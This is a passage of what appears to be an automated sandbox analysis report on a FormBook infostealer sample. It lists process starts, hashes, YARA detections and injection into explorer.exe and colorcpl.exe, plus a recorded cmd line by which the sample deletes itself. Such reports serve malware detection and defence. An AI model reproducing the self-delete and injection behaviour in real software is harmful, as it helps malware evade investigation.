63 65 73 2e 3c 2f 74 64 3e 0a 09 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 0a 0d 0a
                                                                                                                              Data Ascii: 29a<head><meta name="robots" content="noindex, nofollow"></head><table width="100%" height="100%"><tr align="center"><td id="new-box"><h3>*.com is a registered domain.<br>This is a placeholder for the website.</td></tr><tr align="center"><td>If you would like to <strong>host a website</strong> / <strong>obtain a personalised email address</strong> / <strong>link up to Google apps</strong>. Do get in touch with us.<br> Vodien offers Singapore hosted servers for <a href="http://www.vodien.com/">Singapore Web Hosting</a> and <a href="http://www.vodien.com/singapore-email-hosting.php">Singapore Email Hosting</a> services.</td></tr></table>


                                                                                                                              Code Manipulations

                                                                                                                              Statistics

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Start time:18:03:39
                                                                                                                              Start date:27/09/2021
                                                                                                                              Path:C:\Users\user\Desktop\3cGH9Bakuq.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:'C:\Users\user\Desktop\3cGH9Bakuq.exe'
                                                                                                                              Imagebase:0x240000
                                                                                                                              File size:626688 bytes
                                                                                                                              MD5 hash:0ECA879131A7B104418B085DB7F761C3
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.686799799.0000000002604000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              Reputation:low

                                                                                                                              General

                                                                                                                              Start time:18:03:49
                                                                                                                              Start date:27/09/2021
                                                                                                                              Path:C:\Users\user\Desktop\3cGH9Bakuq.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Users\user\Desktop\3cGH9Bakuq.exe
                                                                                                                              Imagebase:0xa0000
                                                                                                                              File size:626688 bytes
                                                                                                                              MD5 hash:0ECA879131A7B104418B085DB7F761C3
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low

                                                                                                                              General

                                                                                                                              Start time:18:03:50
                                                                                                                              Start date:27/09/2021
                                                                                                                              Path:C:\Users\user\Desktop\3cGH9Bakuq.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\Desktop\3cGH9Bakuq.exe
                                                                                                                              Imagebase:0x440000
                                                                                                                              File size:626688 bytes
                                                                                                                              MD5 hash:0ECA879131A7B104418B085DB7F761C3
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              Reputation:low

                                                                                                                              General

                                                                                                                              Start time:18:03:52
                                                                                                                              Start date:27/09/2021
                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                                                              Imagebase:0x7ff6fee60000
                                                                                                                              File size:3933184 bytes
                                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:18:04:29
                                                                                                                              Start date:27/09/2021
                                                                                                                              Path:C:\Windows\SysWOW64\autofmt.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                                                                                              Imagebase:0x10f0000
                                                                                                                              File size:831488 bytes
                                                                                                                              MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate

                                                                                                                              General

                                                                                                                              Start time:18:04:30
                                                                                                                              Start date:27/09/2021
                                                                                                                              Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                              Imagebase:0xdc0000
                                                                                                                              File size:86528 bytes
                                                                                                                              MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              Reputation:moderate

                                                                                                                              General

                                                                                                                              Start time:18:04:36
                                                                                                                              Start date:27/09/2021
                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:/c del 'C:\Users\user\Desktop\3cGH9Bakuq.exe'
                                                                                                                              Imagebase:0x11d0000
                                                                                                                              File size:232960 bytes
                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              General

                                                                                                                              Start time:18:04:36
                                                                                                                              Start date:27/09/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff724c50000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Disassembly

                                                                                                                              Code Analysis

                                                                                                                              Reset < >